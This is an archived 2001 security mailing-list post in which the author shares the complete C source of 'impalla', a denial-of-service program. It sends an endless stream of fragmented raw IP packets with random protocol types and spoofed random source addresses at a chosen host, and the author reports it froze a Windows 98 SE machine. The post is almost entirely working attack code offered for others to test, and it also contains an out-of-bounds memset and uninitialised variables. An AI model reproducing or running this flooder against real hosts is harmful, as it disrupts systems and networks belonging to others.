Windows DoS testing

From: Auriemma Luigi (kaino3at_private)
Date: Fri Apr 13 2001 - 03:08:59 PDT

Next message: Nick: "Re: Ports vulnerability database"

Previous message: Jay D. Dyson: "Re: Apache Win32 8192 string bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Author: Auriemma Luigi <kaino3at_private>

Some months ago I have modified (very very casually for learn a bit of C)
a program that send fragmented IGMP type 8 packets to Windows host; now my
DoS program send random packets type, from random source. I have
tried the DoS program only on a Win98SE and it freeze for all the DoS
time.
Now I have posted the source code for have comments, suggestions and
reports from you, and I hope that someone want to test it on other machine
and systems.


Thanks.


--- IMPALLA.C ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>

struct pack
{
        unsigned char pack_type;
        unsigned char pack_code;
        unsigned short pack_cksum;
};
#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}
u_long  resolve(char *);
int main(int argc, char *argv[])
{
 int nsock, ctr, f;
 char *pkt, *data;
 struct ip *nip;
 struct pack *npack;
 struct sockaddr_in s_addr_in;
 setvbuf(stdout, NULL, _IONBF, 0);
 if(argc != 2)
  ERROR("usage: impalla <host>");
 if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  ERROR("could not create raw socket");
 pkt = malloc(1500);
 if(!pkt)
  ERROR("could not allocate memory");
 memset(&s_addr_in, 0, sizeof(s_addr_in));
 memset(pkt, 0, 1500);
 nip = (struct ip *) pkt;
 npack = (struct pack *) (pkt + sizeof(struct ip));
 data = (char *)(pkt + sizeof(struct ip) + sizeof(struct pack));
 memset(data, ctr*f, 1500-(sizeof(struct ip) + sizeof(struct pack)));
 s_addr_in.sin_addr.s_addr = resolve(argv[1]);
 nip->ip_v  = 4;
 nip->ip_hl  = 5;
 nip->ip_tos  = 0x8;
 nip->ip_ttl  = 255;
 nip->ip_sum  = 0;
 nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
 nip->ip_src.s_addr = s_addr_in.sin_addr.s_addr;
 npack->pack_cksum = 0;
 npack->pack_type = 0;
 npack->pack_code = 0;
while (1)
{
 memset(data, rand(), 4000);
 nip->ip_src.s_addr = rand();
 nip->ip_p = rand();
 nip->ip_id = rand();
 nip->ip_len  = rand();
 nip->ip_off  = htons(IP_MF);
 sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));
}
}
u_long resolve(char *host)
{
        struct hostent *he;
        u_long ret;
        if(!(he = gethostbyname(host)))
        {
                herror("gethostbyname()");
                exit(-1);
        }
        memcpy(&ret, he->h_addr, sizeof(he->h_addr));
        return ret;
}

--- END ---

Next message: Nick: "Re: Ports vulnerability database"
Previous message: Jay D. Dyson: "Re: Apache Win32 8192 string bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 16:37:07 PDT